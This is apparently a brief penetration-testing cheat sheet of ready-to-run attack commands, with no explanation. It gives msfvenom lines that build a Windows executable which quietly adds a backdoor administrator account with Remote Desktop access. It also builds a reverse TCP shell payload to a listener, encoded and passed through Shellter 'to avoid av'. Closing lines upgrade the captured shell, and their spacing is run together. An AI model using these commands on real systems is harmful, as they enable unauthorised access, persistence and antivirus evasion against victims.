Setup nc listener with a opened port from nmap to avoid firewall block from victim
msfvenom -p windows/exec CMD="cmd.exe /c net user /add pwn pwd && net localgroup administrators pwn /add && net localgroup \"Remote Desktop Users\" pwn /add" -a x86 -f exe --platform windows > X.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin
#shellter custom payload to avoid av
shellter A > N > C > .bin > N
# In reverse shell$python-c'import pty; pty.spawn("/bin/bash")'Ctrl-Z# In Kali$echo $TERM; sttysize; sttyraw-echo; fg#note the value#*enter*2# In reverse shell$reset# $exportSHELL=bash$exportTERM=xterm-256color#value from b4$sttyrows<num>columns<cols>#value from b4